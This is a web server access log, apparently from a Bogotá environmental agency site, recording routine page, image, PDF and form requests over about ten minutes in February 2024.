173.252.107.117 - - [27/Feb/2024:02:52:54 -0500] "GET /bogota-cundinamarca-y-antioquia-comparten-experiencias-y-se-unen-para-monitorear-el-aire-en-sus-territorios.html HTTP/1.1" 200 931
173.252.107.117 - - [27/Feb/2024:02:52:54 -0500] "GET /bogota-cundinamarca-y-antioquia-comparten-experiencias-y-se-unen-para-monitorear-el-aire-en-sus-territorios.html HTTP/1.1" 200 931
173.252.79.2 - - [27/Feb/2024:02:52:56 -0500] "GET /images/calidad-aire.jpg HTTP/1.1" 200 42421
201.245.192.253 - - [27/Feb/2024:02:53:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:02:53:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
173.252.107.119 - - [27/Feb/2024:02:54:01 -0500] "GET /secretaria-de-ambiente-inicia-campana-de-proteccion-y-conservacion-de-musgo-para-epoca-de-navidad.html HTTP/1.1" 200 876
173.252.107.117 - - [27/Feb/2024:02:54:01 -0500] "GET /consulta-y-conoce-los-proyectos-de-resolucion-de-para-los-planes-de-manejo-ambiental-de-cinco-humedales-en-bogota.html HTTP/1.1" 200 971
173.252.107.8 - - [27/Feb/2024:02:54:01 -0500] "GET /humedal-salitre-reverdece-con-mas-de-90-nuevos-arboles.html HTTP/1.1" 200 888
173.252.107.7 - - [27/Feb/2024:02:54:01 -0500] "GET /participa-del-panel-progreso-hacia-un-aire-limpio.html HTTP/1.1" 200 906
173.252.107.2 - - [27/Feb/2024:02:54:01 -0500] "GET /consulta-y-conoce-los-proyectos-de-resolucion-de-para-los-planes-de-manejo-ambiental-de-cinco-humedales-en-bogota.html HTTP/1.1" 200 971
173.252.107.7 - - [27/Feb/2024:02:54:01 -0500] "GET /secretaria-de-ambiente-inicia-campana-de-proteccion-y-conservacion-de-musgo-para-epoca-de-navidad.html HTTP/1.1" 200 876
173.252.107.116 - - [27/Feb/2024:02:54:01 -0500] "GET /humedal-salitre-reverdece-con-mas-de-90-nuevos-arboles.html HTTP/1.1" 200 888
173.252.107.118 - - [27/Feb/2024:02:54:01 -0500] "GET /participa-del-panel-progreso-hacia-un-aire-limpio.html HTTP/1.1" 200 906
173.252.107.10 - - [27/Feb/2024:02:54:02 -0500] "GET /manos-reparadoras-una-alternativa-y-tendencia-de-moda-sostenible.html HTTP/1.1" 200 810
173.252.107.120 - - [27/Feb/2024:02:54:02 -0500] "GET /manos-reparadoras-una-alternativa-y-tendencia-de-moda-sostenible.html HTTP/1.1" 200 810
201.245.192.253 - - [27/Feb/2024:02:54:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:02:52:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:02:53:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
201.245.192.253 - - [27/Feb/2024:02:55:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:56:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:02:57:05 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.5 - - [27/Feb/2024:02:57:34 -0500] "GET /tramites-y-servicios-ambientales-llegan-este-fin-de-semana-en-la-feria-movil-de-servicios-de-chapinero.html HTTP/1.1" 200 881
173.252.107.5 - - [27/Feb/2024:02:57:34 -0500] "GET /tramites-y-servicios-ambientales-llegan-este-fin-de-semana-en-la-feria-movil-de-servicios-de-chapinero.html HTTP/1.1" 200 881
173.252.127.2 - - [27/Feb/2024:02:57:34 -0500] "GET /images/feria-servicios-3-marzo.jpg HTTP/1.1" 200 39802
173.252.107.9 - - [27/Feb/2024:02:57:38 -0500] "GET /images/feria-servicios-3-marzo.jpg HTTP/1.1" 200 39802
201.245.192.253 - - [27/Feb/2024:02:57:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
173.252.127.116 - - [27/Feb/2024:02:57:55 -0500] "GET /tramites-y-servicios-ambientales-llegan-este-fin-de-semana-en-la-feria-movil-de-servicios-de-chapinero.html HTTP/1.1" 200 881
201.245.192.253 - - [27/Feb/2024:02:58:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:02:58:22 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [27/Feb/2024:02:58:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:02:59:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:02:58:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:02:58:24 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 49794
201.245.192.253 - - [27/Feb/2024:03:00:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:02:59:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54913
201.245.192.253 - - [27/Feb/2024:03:01:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:03:02:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:03:02:05 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [27/Feb/2024:03:02:21 -0500] "GET /BLA/resoluciones/AUTOS%202023/0117.pdf HTTP/1.1" 200 503520
216.244.66.195 - - [27/Feb/2024:03:02:28 -0500] "GET /BLA/resoluciones/AUTOS%202023/0223.pdf HTTP/1.1" 200 462123
216.244.66.195 - - [27/Feb/2024:03:02:43 -0500] "GET /BLA/resoluciones/AUTOS%202023/0261.pdf HTTP/1.1" 200 462396
216.244.66.195 - - [27/Feb/2024:03:03:20 -0500] "GET /BLA/resoluciones/AUTOS%202023/0318.pdf HTTP/1.1" 200 379154
201.245.192.253 - - [27/Feb/2024:03:03:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:03:03:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
